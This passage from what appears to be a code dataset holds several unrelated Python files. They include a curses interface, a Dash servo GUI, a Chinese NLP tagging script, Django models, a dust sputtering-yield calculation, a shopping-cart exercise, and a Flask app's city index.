set(str1_list) & set(str2_list)\n union = set(str1_list) | set(str2_list)\n\n top = 0\n bot = 0\n for key in intersection:\n top += min(str1_list.count(key), str2_list.count(key))\n for key in union:\n bot += max(str1_list.count(key), str2_list.count(key))\n\n if bot == 0:\n answer = 1\n else:\n answer = top / bot\n answer = int(answer * 65536)\n return answer","repo_name":"Andrevile/Algorithm","sub_path":"Programmers/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38552083534","text":"import curses\n\nw_width = 80\nmw_height = 30\ntw_height = 10\nsw_height = 1\n\n\nclass Interface(object):\n\n def __init__(self, stdscr, display_settings):\n self.stdscr = stdscr\n self.settings = display_settings\n\n self.show_splash()\n\n self.create_windows()\n\n self.mw.refmsg(\"this is the map window\", where=\"center\")\n self.tw.refmsg(\"this is the text window\", where=\"top_center\")\n self.sw.refmsg(\"this is the status window\", where=\"center\")\n\n\n def hold(self):\n try:\n # Preserve the status window's original contents\n prev_msg = self.sw.w.instr(0, 0, self.settings.w_width - 2)\n\n # Wait for the user to prompt execution to continue\n self.sw.refmsg(\"HOLD: press k to move on\")\n c = None\n while c != \"k\":\n c = self.stdscr.getkey()\n\n # Restore the status window's original contents\n self.sw.refmsg(prev_msg)\n\n except AttributeError:\n c = None\n while c != \"k\":\n c = self.stdscr.getkey()\n except Exception as err:\n raise EOFError\n\n\n def show_splash(self):\n self.stdscr.clear()\n self.stdscr.addstr(0, 0, \"interface initialized\")\n self.stdscr.addstr(1, 0, \"press k to move on\")\n self.stdscr.refresh()\n\n self.hold()\n\n\n def create_windows(self):\n cline = 0\n\n self.d0 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d0.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n cline += 1\n\n self.mw = cursesWindow(self.settings[\"mw_height\"], self.settings[\"w_width\"], cline, 0)\n cline += self.settings[\"mw_height\"]\n\n self.d1 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d1.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n cline += 1\n\n self.tw = cursesWindow(self.settings[\"tw_height\"], self.settings[\"w_width\"], cline, 0)\n cline += self.settings[\"tw_height\"]\n\n self.d2 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d2.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n cline += 1\n\n self.sw = cursesWindow(self.settings[\"sw_height\"], self.settings[\"w_width\"], cline, 0)\n cline += self.settings[\"sw_height\"]\n\n self.d3 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d3.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n\n\n def show_menu(self):\n self.mw.refmsg(\"This is the menu.\", where=\"center\")\n\n self.hold()\n\n\n def prompt_quit_game(self):\n self.stdscr.clear()\n self.stdscr.addstr(0, 0, \"Would you really like to quit? 
(press 'q' again)\")\n self.stdscr.refresh()\n\n rc = 0\n\n c = self.stdscr.getkey()\n if c == \"q\":\n rc = -1\n\n return -1\n\n\nclass cursesWindow(object):\n\n def __init__(self, height, width, y_start, x_start):\n self.height = height\n self.width = width\n self.y_start = y_start\n self.x_start = x_start\n\n self.w = curses.newwin(height, width, y_start, x_start)\n\n\n def refmsg(self, msg, where=\"upper_left\"):\n y_start = 0\n x_start = 0\n\n if where == \"center\":\n y_start = int(self.height / 2)\n\n if len(msg) < self.width:\n x_start = int((self.width - len(msg)) / 2)\n elif where == \"top_center\":\n y_start = 0\n if len(msg) < self.width:\n x_start = int((self.width - len(msg)) / 2)\n\n self.w.clear()\n self.w.addstr(y_start, x_start, msg)\n self.w.refresh()\n\n","repo_name":"biegelk/uriel","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72341352194","text":"\n################################################################################\n###\n### Libraries\n###\n################################################################################\nimport dash\n\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\n# import plotly.graph_objects as go\nfrom dash.dependencies import Input, Output\n\nfrom assets.servo_control import servo_manager\n\n\n################################################################################\n###\n### Setup\n###\n################################################################################\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.DARKLY, 'criddyp.css', 'custom.css'], title='servo GUI', update_title=None)\n# app.config.suppress_callback_exceptions = True\n\nsm = servo_manager()\n\n\n################################################################################\n###\n### Layout\n###\n################################################################################\napp.layout = html.Div([\n\n dbc.Row(\n [\n # counter clockwise\n dbc.Col(\n [\n dbc.Button('Counter Clockwise', id='b_spin_clock', className='center'),\n html.Div(id='ret_spin_clock'),\n ],\n ),\n\n # gauge to show current position\n dbc.Col(\n [\n dcc.Graph(id='fig', figure=sm.get_fig())\n ],\n ),\n\n # clockwise button\n dbc.Col(\n [\n dbc.Button('Clockwise', id='b_spin_counter', className='center'),\n html.Div(id='ret_spin_counter'),\n\n ],\n ), \n ],\n ),\n\n dbc.Row(\n [\n # return to zero\n dbc.Col(\n [\n dbc.Button('Return to zero', id='b_ret_zero', className='center'),\n html.Div(id='ret_ret_zero'),\n ], \n ),\n ],\n ),\n\n # interval\n dcc.Interval(\n id='interval',\n interval=500, # in milliseconds\n n_intervals=0\n )\n\n],className='body',)\n\n################################################################################\n###\n### Callbacks\n###\n################################################################################\n\n# counter clockwise\n@app.callback(\n Output(component_id='ret_spin_counter', component_property='children'),\n Input(component_id='b_spin_counter', component_property='n_clicks'),\n)\ndef spin_counter(n):\n global sm\n triggered = [p['prop_id'].split('.')[0] for p in dash.callback_context.triggered]\n if 'b_spin_counter' in triggered:\n print('ccw')\n sm.move_servo('ccw')\n return ''\n\n# clockwise\n@app.callback(\n Output(component_id='ret_spin_clock', component_property='children'),\n 
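# prompt_quit_game() above computes rc from the keypress but then unconditionally
# returns -1, so any key confirms the quit; returning rc restores the confirmation
# (a drop-in replacement for the method):
def prompt_quit_game(self):
    self.stdscr.clear()
    self.stdscr.addstr(0, 0, "Would you really like to quit? (press 'q' again)")
    self.stdscr.refresh()
    rc = 0
    if self.stdscr.getkey() == "q":
        rc = -1
    return rc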
Input(component_id='b_spin_clock', component_property='n_clicks'),\n)\ndef spin_clock(n):\n    global sm\n    triggered = [p['prop_id'].split('.')[0] for p in dash.callback_context.triggered]\n    if 'b_spin_clock' in triggered:\n        print('cw')\n        sm.move_servo('cw')\n    return ''\n\n# return to zero\n@app.callback(\n    Output(component_id='ret_ret_zero', component_property='children'),\n    Input(component_id='b_ret_zero', component_property='n_clicks')\n)\ndef ret_zero(n):\n    global sm\n    triggered = [p['prop_id'].split('.')[0] for p in dash.callback_context.triggered]\n    if 'b_ret_zero' in triggered:\n        print('goto zero')\n        sm.goto_zero()\n    \n\n# update graphic\n@app.callback(\n    Output(component_id='fig', component_property='figure'),\n    Input(component_id='interval', component_property='n_intervals'),\n)\ndef update_fig(n):\n    global sm\n    return sm.get_fig()\n\n\n################################################################################\n###\n### Run\n###\n################################################################################\nif __name__ == '__main__':\n    app.run_server(debug=True, port=8080, host='169.254.228.85')","repo_name":"einelson/simple-servo-gui","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40250891169","text":"import os\nimport pkuseg\nfrom pyltp import Postagger\nfrom pyltp import NamedEntityRecognizer\n\n\"\"\"Segment text with pkuseg, then POS-tag it and run named entity recognition with LTP\"\"\"\n\nLTP_DATA_DIR = \"../../ltp_data_v3.4.0\"  # path to the ltp model directory; adjust to your setup\ninput_file = \"../01数据预处理/txt_files/truth.txt\"\noutput_file = \"seg_pos_ner_result.txt\"\n\n# LTP part-of-speech tagging model\npos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model')  # POS tagging model path\npostagger = Postagger()  # initialize the POS tagger\npostagger.load(pos_model_path)  # load the model\n\n# LTP named entity recognition model\nner_model_path = os.path.join(LTP_DATA_DIR, 'ner.model')  # NER model path\nrecognizer = NamedEntityRecognizer()  # initialize the NER recognizer\nrecognizer.load(ner_model_path)  # load the model\n\n\ndef spn(text):\n    \"\"\"Segment the text, POS-tag it and recognize named entities\"\"\"\n    # segment with the pkuseg tool\n    text = text.replace(\"。\", \"\")  # strip full-width periods\n    seg = pkuseg.pkuseg(model_name='customized_model', user_dict='dict')\n    words = seg.cut(text)\n    postags = postagger.postag(words)  # POS tagging\n    netags = recognizer.recognize(words, postags)  # named entity recognition\n    return zip(words, postags, netags)\n\n\n# segment, POS-tag and NER-tag each line of the input file\nf_input = open(input_file, \"r\", encoding=\"utf-8\")\nf_output = open(output_file, \"w\", encoding=\"utf-8\")\nlines = f_input.readlines()\nidx = 1\nfor line in lines:\n    zipped = spn(line)\n    for word, postag, netag in zipped:\n        f_output.write(word + \"\\t\" + postag + \"\\t\" + netag + \"\\n\")\n    f_output.write(\"\\n\")\n    print(str(idx) + \" lines finished.\")\n    idx += 1\n\nf_input.close()\nf_output.close()\n\n# release the LTP models\npostagger.release()\nrecognizer.release()\n","repo_name":"zhang17173/event-element-extraction-based-on-judgments","sub_path":"02分词、词性标注、命名实体识别/seg_pos_ner.py","file_name":"seg_pos_ner.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"28777530067","text":"from django.db import models\n\n# Create your models here.\n\nclass StoreImage(models.Model):\n    licenseImage = models.ImageField(upload_to='images/')\n\nclass DriverInfo(models.Model):\n    licenseNo=models.TextField()\n    nameOfDriver=models.TextField()\n    
age=models.IntegerField()\n","repo_name":"joshiGaurav-2712/Automatic-Licence-Plate-Number-Recognition-Website","sub_path":"LPR/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71965474753","text":"import CGS as cgs\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import ode as ode\n\n\n\ndef finite_grain_correction(E, agrain, Zp, graphite):\n if graphite:\n p1 = 4.9\n p2 = 0.55\n p3 = 0.77\n p4 = 4.7\n p5 = 3.0\n p6 = 1.2\n ap = -4.37\n else:\n p1 = 1.0\n p2 = 0.5\n p3 = 1.0\n p4 = 1.8\n p5 = 2.1\n p6 = 0.76\n ap = -3.34\n\n\n rp = 10**(2.8*Zp**-0.21 + ap) * (E/cgs.eV) * 1e-7\n\n xs = agrain/(0.7*rp)\n\n fx = 1 + p1*np.exp(-np.log(xs/p2)**2/(2*p3**2)) - p4*np.exp(-(p5*xs - p6)**2)\n return max(fx,0)\n\ndef stopping_sigma(E, Mp, Zp, Md, Zd):\n a0 = 0.529*cgs.A\n asc = 0.885*a0*(Zp**(2/3) + Zd**(2/3))**(-1/2)\n\n ered = Md/(Mp + Md) * asc * E/(Zp*Zd*cgs.qe_ESU**2)\n\n si = 3.441*np.sqrt(ered) * np.log(ered + 2.718) / (1+6.35*np.sqrt(ered) + ered*(-1.708 + 6.882*np.sqrt(ered)))\n\n\n return 4*np.pi*asc*Zp*Zd*cgs.qe_ESU**2 * Mp/(Mp+Md) * si\n\n\n\ndef sputteringYield(E, Mp, Zp, Md, Zd, U0, K):\n mui = Md/Mp\n gi = 4*Mp*Md/(Mp + Md)**2\n \n if 1/mui <= 0.3:\n Ethresh = U0/(gi*(1-gi))*cgs.eV\n else:\n Ethresh = 8*U0*mui**(-1/3)*cgs.eV\n if E < Ethresh:\n return 0 \n\n if mui <= 0.5:\n alphai = 0.2\n elif mui < 1:\n alphai = 0.1/mui + 0.25*(mui - 0.5)**2\n else:\n alphai = 0.3*(mui - 0.6)**(2/3)\n\n\n Si = stopping_sigma(E, Mp, Zp, Md, Zd)\n\n yld = 4.2e14 * (Si/cgs.eV)/U0 * alphai/(K*mui +1) * (1 - (Ethresh/E)**(2/3))*(1 - Ethresh/E)**2\n return yld\n\ndef Maxwellian(Ener, kbTgas, Mpart):\n return (Mpart/(2*np.pi*kbTgas))**(1/2)*4*Ener/(kbTgas)*np.exp(-Ener/(kbTgas))\n\ndef maxwellSputteringYield(vel, integral, Mp, Zp, Md, Zd, U0, K, kbTgas, agrain, graphite):\n Ener = 0.5*Mp*cgs.mH*vel**2\n\n yld = sputteringYield(Ener, Mp, Zp, Md, Zd, U0, K)\n Maxwell = Maxwellian(Ener, kbTgas, Mp*cgs.mH)\n fx = finite_grain_correction(Ener, agrain, Zp, graphite)\n if(yld*Maxwell*vel*fx < 0):\n print(vel, yld, Maxwell, fx)\n return yld*Maxwell*vel*fx\n\ndef getAverageSputtering(Mp, Zp, Md, Zd, U0, K, kbTgas, agrain, graphite):\n mui = Md/Mp\n gi = 4*Mp*Md/(Mp + Md)**2\n \n if 1/mui <= 0.3:\n Ethresh = U0/(gi*(1-gi))*cgs.eV\n else:\n Ethresh = 8*U0*mui**(-1/3)*cgs.eV\n \n integrator = ode(maxwellSputteringYield).set_integrator('dopri5')\n integrator.set_initial_value(0, np.sqrt(2*Ethresh/(Mp*cgs.mH))).set_f_params(Mp, Zp, Md, Zd, U0, K, kbTgas, agrain, graphite)\n y = integrator.integrate(np.sqrt(100*kbTgas/(Mp*cgs.mH)))\n return max(y[0],0)\n\n\ndef getTotalLoss(Md, Zd, U0, K, kbTgas, proj_mass, proj_atom, proj_abund, agrain, graphite):\n\n totSputter = 0\n for pi in range(len(proj_mass)):\n totSputter += getAverageSputtering(proj_mass[pi], proj_atom[pi], Md, Zd, U0, K, kbTgas, agrain, graphite)*proj_abund[pi]\n\n return totSputter\n\n# projectile properties\nproj_mass = np.array([1, 4 , 12 , 14 , 16 ])\nproj_atom = np.array([1, 2 , 6 , 7 , 8 ])\nproj_abund = np.array([1, 0.1, 1e-4, 1e-5, 3e-4]) \n\n# carbon\nMd_c = 12\nZd_c = 6\nK_c = 0.61\nU0_c = 4.0\n\n#silicate\nMd_s = 20\nZd_s = 10\nK_s = 0.1\nU0_s = 5.8\nnumTemps = 50\nnumGrains = 30\nTgas = np.logspace(3,10, numTemps)\ntotLoss_graphite = np.zeros(Tgas.shape)\ntotLoss_silicone = np.zeros(Tgas.shape)\nagrains = np.logspace(np.log10(3*cgs.A), np.log10(1e-3), numGrains)\nwith 
open('sputtering_yield.dat', 'w') as f:\n f.write('# ngrain = {}\\n'.format(numGrains))\n f.write('# ntemps = {}\\n'.format(numTemps))\n for agrain in agrains:\n print(agrain)\n for i in range(len(Tgas)):\n totLoss_graphite[i] = getTotalLoss(Md_c, Zd_c, U0_c, K_c, cgs.kb*Tgas[i], proj_mass, proj_atom, proj_abund, agrain, 1)\n totLoss_silicone[i] = getTotalLoss(Md_s, Zd_s, U0_s, K_s, cgs.kb*Tgas[i], proj_mass, proj_atom, proj_abund, agrain, 0)\n f.write('{} {} {} {}\\n'.format(agrain, Tgas[i], totLoss_graphite[i], totLoss_silicone[i]))\n totLoss_graphite = totLoss_graphite * (Md_c*cgs.mH/(2*2.25))\n totLoss_silicone = totLoss_silicone * (Md_s*cgs.mH/(2*3.2))\n P = plt.plot(Tgas, totLoss_graphite/(1e-4/cgs.yr))\n plt.plot(Tgas, totLoss_silicone/(1e-4/cgs.yr), c = P[0].get_color(), ls = '--')\nplt.xscale('log')\nplt.yscale('log')\nplt.xlim(1e4, 1e10)\nplt.ylim(1e-9, 1e-4)\nplt.show()\n'''\nproj_mass = np.array([1, 2, 4, 20, 40])\nproj_atom = np.array([1, 1, 2, 10, 18])\nproj_cols = ['k', 'r', 'g', 'orange', 'b']\n\nEners = np.logspace(1, 6) * cgs.eV\nyelds = np.zeros(Eners.shape)\n\nfig, ax = plt.subplots(1,1)\nfor pi in range(len(proj_mass)):\n for i in range(len(Eners)):\n yelds[i] = sputteringYield(Eners[i], proj_mass[pi], proj_atom[pi], Md, Zd, U0, K)\n\n ax.plot(Eners/cgs.eV, yelds, c = proj_cols[pi])\nax.set_xscale('log')\nax.set_yscale('log')\nax.set_xlim(10, 1e6)\nax.set_ylim(1e-4, 10)\nplt.show()\n'''\n\n\n\n\n\n","repo_name":"LokeOhlin/MOSHPIT","sub_path":"tools/SputteringTable_generator/sputtering_yields.py","file_name":"sputtering_yields.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31384702281","text":"# Colton DeWitt - May 3, 2022\r\nclass ItemToPurchase:\r\n def __init__(self, item_name='none', item_description='none',\r\n item_price=0, item_quantity=0): # Initialize and sets defaults of item to buy\r\n self.item_name = item_name\r\n self.item_description = item_description\r\n self.item_price = item_price\r\n self.item_quantity = item_quantity\r\n\r\n def print_item_description(self): # Print the item description\r\n print('{}: {}'.format(self.item_name, self.item_description))\r\n\r\n def print_item_cost(self): # Calculates total cost of items and prints it\r\n total_cost = self.item_price * self.item_quantity\r\n print('{} {} @ ${} = ${}'.format(self.item_name, self.item_quantity, self.item_price, total_cost))\r\n #return total_cost\r\n\r\nclass ShoppingCart: # Customer's shopping cart\r\n def __init__(self, customer_name='none', current_date='January 1, 2016', cart_items=[]):\r\n self.customer_name = customer_name\r\n self.current_date = current_date\r\n self.cart_items = cart_items\r\n\r\n def add_item(self, item): # Adds an item to customer's cart\r\n self.cart_items.append(item)\r\n\r\n def remove_item(self, removing_item): # Remove an item from customer's cart\r\n item_removed = False\r\n for item in self.cart_items: # Iterate through the customer's cart\r\n if removing_item == item.item_name: # Search each class object in cart and check the name\r\n self.cart_items.remove(item) # Remove the class object with the matching name of item to remove\r\n print()\r\n item_removed = True\r\n\r\n if item_removed == False:\r\n print('Item not found in cart. 
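# The ODE integrator above accumulates Y(E)*f(E)*v from the threshold velocity up to
# v = sqrt(100*kbT/M); the same Maxwell-averaged rate can be cross-checked for any
# yield function with scipy.integrate.quad (a sketch mirroring the integrand above):
import numpy as np
from scipy.integrate import quad

def maxwell_average(yield_of_E, mass, kbT, E_thresh):
    """<Y(E) v> over the Maxwellian speed distribution used above."""
    def integrand(v):
        E = 0.5 * mass * v * v
        fE = np.sqrt(mass / (2 * np.pi * kbT)) * 4 * E / kbT * np.exp(-E / kbT)
        return yield_of_E(E) * fE * v
    v_lo = np.sqrt(2 * E_thresh / mass)
    v_hi = np.sqrt(100 * kbT / mass)
    return max(quad(integrand, v_lo, v_hi, limit=200)[0], 0.0)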
Nothing removed.\\n')\r\n\r\n def modify_item(self, changing_item, changed_quantity):\r\n item_changed = False\r\n for item in self.cart_items:\r\n if changing_item == item.item_name: # Search each class object in cart and check the name\r\n item.item_quantity = changed_quantity # Update the quantity attribute of the correct instance object\r\n item_changed = True\r\n\r\n if item_changed == False:\r\n print('Item not found in cart. Nothing modified.\\n')\r\n\r\n def get_num_items_in_cart(self):\r\n num_items_in_cart = 0\r\n for item in self.cart_items: # Iterate through the cart\r\n num_items_in_cart += item.item_quantity # Check each instances quantity attribute and add to num_items_in_c\r\n return num_items_in_cart # Quantity of items in the cart\r\n\r\n def get_cost_of_cart(self):\r\n total_cost_cart = 0\r\n for item in self.cart_items: # TODO Validate if cart is empty???\r\n total_cost_cart += item.item_price * item.item_quantity # For example, three $1 water bottle: 1 * 3 bottles\r\n return total_cost_cart\r\n\r\n def print_total(self): # Print the user's shopping cart and items in it, with their prices. Also total price at end\r\n print('{}\\'s Shopping Cart - {}'.format(self.customer_name, self.current_date))\r\n if self.get_num_items_in_cart() == 0:\r\n print('Number of Items: {}\\n'.format(self.get_num_items_in_cart())) # In this case prints 0 items\r\n print('SHOPPING CART IS EMPTY')\r\n else:\r\n print('Number of Items: {}\\n'.format(self.get_num_items_in_cart())) # Print quantity of items\r\n for item in self.cart_items: # Iterate though the shopping cart\r\n item.print_item_cost() # Print each item in cart and its cost\r\n\r\n print('\\nTotal: ${}\\n'.format(self.get_cost_of_cart())) # Print total cost of all items in cart\r\n\r\n def print_descriptions(self): # Print the user's shopping cart and each item's description. No prices\r\n print('{}\\'s Shopping Cart - {}'.format(self.customer_name, self.current_date))\r\n print('\\nItem Descriptions')\r\n for item in self.cart_items:\r\n item.print_item_description()\r\n print()\r\n\r\n\r\ndef print_menu(): # Print to the user the main menu and their available options\r\n #valid_options = ['a', 'r', 'c', 'i', 'o', 'q']\r\n print('MENU\\n'\r\n 'a - Add item to cart\\n'\r\n 'r - Remove item from cart\\n'\r\n 'c - Change item quantity\\n'\r\n 'i - Output items\\' descriptions\\n'\r\n 'o - Output shopping cart\\n'\r\n 'q - Quit')\r\n #user_choice = input('\\nChoose an option:\\n')\r\n #while user_choice not in valid_options:\r\n #print('Invalid choice. 
Please try again')\r\n #user_choice = input('\\nChoose an option:\\n')\r\n\r\n #return user_choice\r\n\r\n\r\ndef execute_menu(user_choice, shopping_cart): # Get's the user's choice of action from main and the current shop cart\r\n\r\n if user_choice == 'a':\r\n print('ADD ITEM TO CART')\r\n new_item = ItemToPurchase(input('Enter the item name:\\n'), input('Enter the item description:\\n'),\r\n int(input('Enter the item price:\\n')), int(input('Enter the item quantity:\\n')))\r\n shopping_cart.add_item(new_item)\r\n print()\r\n elif user_choice == 'r':\r\n print('REMOVE ITEM FROM CART')\r\n item_to_remove = input('Enter name of item to remove:\\n')\r\n shopping_cart.remove_item(item_to_remove)\r\n elif user_choice == 'c':\r\n print('CHANGE ITEM QUANTITY')\r\n item_to_change = input('Enter the item name:\\n')\r\n new_quantity = int(input('Enter the new quantity:\\n'))\r\n shopping_cart.modify_item(item_to_change, new_quantity)\r\n elif user_choice == 'i':\r\n print('OUTPUT ITEMS\\' DESCRIPTIONS') # Print the user's shopping cart and each item's description. No prices\r\n shopping_cart.print_descriptions()\r\n elif user_choice == 'o':\r\n print('OUTPUT SHOPPING CART') # Shopping cart items and their prices, plus total price of cart\r\n shopping_cart.print_total()\r\n\r\n\r\nif __name__ == '__main__':\r\n customer_cart1 = ShoppingCart(input('Enter customer\\'s name:\\n'), input('Enter today\\'s date:\\n'))\r\n print('\\nCustomer name: {}\\nToday\\'s date: {}\\n'.format(customer_cart1.customer_name, customer_cart1.current_date))\r\n\r\n valid_options = ['a', 'r', 'c', 'i', 'o', 'q']\r\n user_choice_option = 'none'\r\n while user_choice_option != 'q': # Will loop until the user quits the program with 'q'\r\n print_menu()\r\n user_choice_option = 'none'\r\n while user_choice_option not in valid_options:\r\n # print('Invalid choice. Please try again')\r\n user_choice_option = input('\\nChoose an option:') # Get user choice here, must be in valid_options list ^\r\n print()\r\n execute_menu(user_choice_option, customer_cart1)\r\n #if user_choice_option != 'q':\r\n #execute_menu(customer_cart1)\r\n\r\n print('User exited the program. 
Have a nice day.') # Will print after user input 'q', while loop ended\r\n","repo_name":"Ecdewitt1230/Python-code-samples","sub_path":"Shopping Cart.py","file_name":"Shopping Cart.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5430124296","text":"OpenDatabase(\"~/Development/data/silo_hdf5_test_data/bigsil.silo\")\nDefineScalarExpression(\"zid\", \"zoneid(mesh)\")\nDefineScalarExpression(\"radial\", \"recenter(dist)\")\nAddPlot(\"Pseudocolor\", \"zid\")\nDrawPlots()\n\nAddOperator(\"Isosurface\")\niso = IsosurfaceAttributes()\niso.contourNLevels = 3\niso.variable = \"dist\"\nSetOperatorOptions(iso)\nDrawPlots()\n\n# The bug is after this.\nChangeActivePlotsVar(\"dist\")\nSaveWindow() # junky picture\n\n# Make the right picture now.\nCloseComputeEngine()\nClearWindow()\nDrawPlots()\nSaveWindow()\n","repo_name":"aowen87/VisIt_Redmine_2_Github","sub_path":"archive/git_labeled_attachments/1875_bug.py","file_name":"1875_bug.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32484734735","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\n# cors = CORS(app)\nimport pickle\n\napp = Flask(__name__)\nmodel = pickle.load(open('model_final.pkl','rb'))\nwarehouse={'Agartala': 0, 'Agra': 1, 'Ahmednagar': 2, 'Ajmer': 3, 'Akola': 4, \n'Aligarh': 5, 'Allahabad': 6, 'Alwar': 7, 'Ambala': 8, 'Amravati': 9, 'Amritsar': 10, \n'Amroha': 11, 'Anand': 12, 'Anantapur': 13, 'Angul': 14, 'Arrah': 15, 'Asansol': 16, \n'Aurangabad': 17, 'Baddi': 18, 'Bahadurgarh': 19, 'Balasore': 20, 'Bangalore': 21, \n'Bankura': 22, 'Banswara': 23, 'Barabanki': 24, 'Bardhaman': 25, 'Bareilly': 26, \n'Beed': 27, 'Belgaum': 28, 'Berhampur': 29, 'Betul': 30, 'Bhadrak': 31, 'Bhagalpur': 32,\n 'Bhandara': 33, 'Bharatpur': 34, 'Bharuch': 35, 'Bhavnagar': 36, 'Bhilai': 37, 'Bhimavaram': 38,\n 'Bhiwadi': 39, 'Bhiwani': 40, 'Bhopal': 41, 'Bhubaneswar': 42, 'Bhuj': 43, 'Bikaner': 44,\n 'Bilaspur': 45, 'Bokaro': 46, 'Chandigarh': 47, 'Chandrapur': 48, 'Chennai': 49, 'Chhindwara': 50,\n 'Chittoor': 51, 'Coimbatore': 52, 'Cuddalore': 53, 'Cuttack': 54, 'Dahod': 55, 'Dalhousie': 56, \n 'Darbhanga': 57, 'Darjeeling': 58, 'Dehradun': 59, 'Deoghar': 60, 'Dhanbad': 61, 'Dharuhera': 62, \n 'Dharwad': 63, 'Dhule': 64, 'Dibrugarh': 65, 'Durg': 66, 'Durgapur': 67, 'Eluru': 68, 'Ernakulam': 69,\n 'Erode': 70, 'Faizabad': 71, 'Faridabad': 72, 'Gadarwara': 73, 'Gadhinglaj': 74, 'Gandhidham': 75, \n 'Gandhinagar': 76, 'Gaya': 77, 'Ghaziabad': 78, 'Goa': 79, 'Godhra': 80, 'Gondia': 81, 'Gulbarga': 82,\n 'Guntur': 83, 'Gurdaspur': 84, 'Gurgaon': 85, 'Guwahati': 86, 'Gwalior': 87, 'Hajipur': 88, \n 'Haldia': 89, 'Haldwani': 90, 'Hapur': 91, 'Harda': 92, 'Haridwar': 93, 'Hassan': 94, 'Hathras': 95,\n 'Hazaribagh': 96, 'Hoshangabad': 97, 'Hoshiarpur': 98, 'Hosur': 99, 'Hubli': 100, 'Idukki': 101, \n 'Indore': 102, 'Jabalpur': 103, 'Jagdalpur': 104, 'Jaipur': 105, 'Jajpur': 106, 'Jalandhar': 107,\n 'Jalgaon': 108, 'Jalna': 109, 'Jammu': 110, 'Jamnagar': 111, 'Jamshedpur': 112, 'Jhansi': 113, \n 'Jharsuguda': 114, 'Jhunjhunu': 115, 'Jind': 116, 'Jodhpur': 117, 'Junagadh': 118, 'Kadapa': 119, \n 'Kadi': 120, 'Kakinada': 121, 'Kanchipuram': 122, 'Kangra': 123, 'Kannur': 124, 'Kanpur': 125,\n 'Karad': 126, 'Karaikudi': 127, 'Karjat': 128, 'Karnal': 129, 'Karwar': 130, 
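# city name -> integer index; used below to encode the 'City' feature expected by the model\n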
'Kharagpur': 131,\n 'Kochi': 132, 'Kolhapur': 133, 'Kolkata': 134, 'Kollam': 135, 'Korba': 136, 'Kota': 137, \n 'Kotdwara': 138, 'Kottayam': 139, 'Kurnool': 140, 'Kurukshetra': 141, 'Lalitpur': 142, \n 'Latur': 143, 'Lucknow': 144, 'Ludhiana': 145, 'Machilipatnam': 146, 'Madurai': 147,\n 'Maharashtra': 148, 'Malappuram': 149, 'Mangalore': 150, 'Margao': 151, 'Mathura': 152, \n 'Meerut': 153, 'Midnapore': 154, 'Mohali': 155, 'Moradabad': 156, 'Morbi': 157, 'Mumbai': 158,\n 'Muzaffarpur': 159, 'Mysore': 160, 'Nadiad': 161, 'Nagaon': 162, 'Nagapattinam': 163, \n 'Nagaur': 164, 'Nagpur': 165, 'Nainital': 166, 'Nanded': 167, 'Navsari': 168, 'Neemrana': 169, \n 'Nellore': 170, 'Nizamabad': 171, 'Noida': 172, 'Ongole': 173, 'Ooty': 174, 'Osmanabad': 175,\n 'Ottapalam': 176, 'Palakkad': 177, 'Palanpur': 178, 'Palghar': 179, 'Pali': 180, 'Palwal': 181,\n 'Panaji': 182, 'Panchkula': 183, 'Panipat': 184, 'Pathanamthitta': 185, 'Patiala': 186, \n 'Patna': 187, 'Phagwara': 188, 'Pondicherry': 189, 'Porbandar': 190, 'Pudukkottai': 191,\n 'Pune': 192, 'Puri': 193, 'Raichur': 194, 'Raigad': 195, 'Raigarh': 196, 'Raipur': 197, \n 'Raisen': 198, 'Rajkot': 199, 'Rajnandgaon': 200, 'Rajpura': 201, 'Ranchi': 202, \n 'Ratnagiri': 203, 'Rayagada': 204, 'Rewa': 205, 'Rewari': 206, 'Rishikesh': 207, \n 'Rohtak': 208, 'Roorkee': 209, 'Rourkela': 210, 'Rudrapur': 211, 'Sabarkantha': 212, \n 'Sagar': 213, 'Salem': 214, 'Sambalpur': 215, 'Satna': 216, 'Secunderabad': 217, 'Shimla': 218,\n 'Shirdi': 219, 'Siddipet': 220, 'Sikar': 221, 'Silchar': 222, 'Siliguri': 223, \n 'Sindhudurg': 224, 'Siwan': 225, 'Solan': 226, 'Solapur': 227, 'Sonipat': 228, \n 'Srikakulam': 229, 'Srinagar': 230, 'Surat': 231, 'Surendranagar': 232, 'Tenali': 233, \n 'Thanjavur': 234, 'Thoothukudi': 235, 'Thrissur': 236, 'Tirunelveli': 237, 'Tirupati': 238,\n 'Udaipur': 239, 'Udupi': 240, 'Ujjain': 241, 'Vadodara': 242, 'Valsad': 243, 'Vapi': 